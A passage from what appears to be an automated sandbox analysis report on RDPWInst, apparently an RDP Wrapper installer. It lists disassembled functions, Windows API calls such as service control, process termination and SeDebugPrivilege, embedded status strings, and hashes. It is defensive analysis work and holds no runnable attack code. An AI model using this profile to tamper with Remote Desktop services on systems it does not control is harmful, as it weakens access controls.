                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                • API String ID: 1646373207-1918263038
                                                                                • Opcode ID: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                • Instruction ID: c99ab9519c0edb256345e3c1c1fceae5193512a11a1c4a98270a3cb03c9355dc
                                                                                • Opcode Fuzzy Hash: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                                                • Instruction Fuzzy Hash: 25412575A4C2085A5305AB6EB8018FA77B9DA86324374D07FF5088B745DF7CACC2876D
                                                                                Function 0043AE28 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 140serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                                                • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                                                • API String ID: 48634454-3812534468
                                                                                • Opcode ID: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                • Instruction ID: 7a774fc46d996de6837286bf894840c9c95f128f26b1d3a09438fbe6509dfab0
                                                                                • Opcode Fuzzy Hash: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                                                • Instruction Fuzzy Hash: 41418FA4A08200AAD711F7B68C42A5F76A99F88308F11917BB514B6293CB3CAD01967F
                                                                                Function 0043F7A4 Relevance: 22.7, APIs: 2, Strings: 13, Instructions: 229sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                  • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                  • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                  • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                  • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                  • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                  • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                  • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                  • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                  • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                  • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                  • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                  • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                  • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                  • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                  • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                                                • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                                                  • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                  • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                                                • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                                                • API String ID: 3534747103-2332903941
                                                                                • Opcode ID: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                • Instruction ID: 35adde3c6c2359a68fd4b220f91aa0339034fd12c6c7055d874297ef65b27e77
                                                                                • Opcode Fuzzy Hash: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                • Instruction Fuzzy Hash: D5813074E042099BDB04FBA9D48169DB7B1EF8D308F51507AF504F7392DB38AD058B6A
                                                                                Function 0043D938 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 141fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                                                • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                                                • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                                                • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                                                • API String ID: 1427661212-4281953003
                                                                                • Opcode ID: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                • Instruction ID: ad05ad182a3b94ca814d20fd028ad2e32e4b81082960bb03fd6afff070a44f54
                                                                                • Opcode Fuzzy Hash: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                • Instruction Fuzzy Hash: 31414F74A042049BDB00F7B6D94286EB375AF8D308F52813BF500B7697DA3CBD059A6E
                                                                                Function 0041344C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97filewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                  • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                  • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                  • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                                                • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                                                • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                                                • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                                                • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                • String ID: $sD$(4A$LpD
                                                                                • API String ID: 135118572-2961882766
                                                                                • Opcode ID: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                • Instruction ID: ef224b53181cf2408eecbf6e4a49f74db113686e973540ee16aa2e1e81a8a81f
                                                                                • Opcode Fuzzy Hash: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                • Instruction Fuzzy Hash: E4315E71640204BEE710EBA5DC82FDA73BDEB05B05F50417AB604F61D1DE78AE808B69
                                                                                Function 00409E82 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 183libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                                                • GetLastError.KERNEL32(?), ref: 00409F4A
                                                                                • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                                                • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                                                • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                                                • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                                                • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                                                • GetLastError.KERNEL32 ref: 0040A031
                                                                                • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                                                  • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                                                  • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                                                • String ID: $
                                                                                • API String ID: 4255670546-3993045852
                                                                                • Opcode ID: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                • Instruction ID: e7bef61209e92d946731ec4a4071e7a79c0b4aa0f4738c46576ebf8cfa3b661b
                                                                                • Opcode Fuzzy Hash: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                • Instruction Fuzzy Hash: EE618D7590070AAFDB21DFA5D885BAFB3B4AF48314F14803AE504B62D2D7789D44CB59
                                                                                Function 00403B64 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 277windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                                                • API String ID: 2030045667-2939321579
                                                                                • Opcode ID: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                • Instruction ID: 997706f527e00cc568bc624ae0a330c29571725258f71f9dd8560831bc4d878f
                                                                                • Opcode Fuzzy Hash: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                • Instruction Fuzzy Hash: E5B1B434A042548FDB20DF2DC884B997BE8AB09745F1441FAE449F7382CB799E85CB59
                                                                                Function 00415198 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 203threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                                                  • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 4232894706-2493093252
                                                                                • Opcode ID: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                • Instruction ID: d9a4c13083f090c9220c38b115c8470d0dd0b24888f81dbd48f38483d2476b95
                                                                                • Opcode Fuzzy Hash: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                • Instruction Fuzzy Hash: C6717E34B005489BDB04EBA5C881BDF73A6DB88308F50843BB201EB39ADA3DDD95975C
                                                                                Function 0041983C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                                                • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                • String ID:
                                                                                • API String ID: 351091851-3916222277
                                                                                • Opcode ID: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                • Instruction ID: 05f3e7187411a66581312748be8f4c599b64c7f757b61d9c7bcf5be2e84cfcbc
                                                                                • Opcode Fuzzy Hash: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                • Instruction Fuzzy Hash: BB510E75A1061D9BCB62DB59CC91AD9B3BCAF0C314F0041DAE509D7311DA389FC18F69
                                                                                Function 00406190 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$Message
                                                                                • String ID: Error$Runtime error at 00000000
                                                                                • API String ID: 1570097196-2970929446
                                                                                • Opcode ID: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                • Instruction ID: 3d9f27a079d1a1e85d20769b70378e11af8d5357eb747b9bac5a8d01f7cd0a80
                                                                                • Opcode Fuzzy Hash: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                • Instruction Fuzzy Hash: F8F09064688700B9FA1077A09D8BF5A264C5741F18F648A7FBA107C0E3C7FC44C5D66E
                                                                                Function 00403220 Relevance: 10.9, APIs: 7, Instructions: 407COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                • Instruction ID: cdb4153b94d32a19bbaa749183bbd41ea1cad44ce1b02117721c392bcbf59f8f
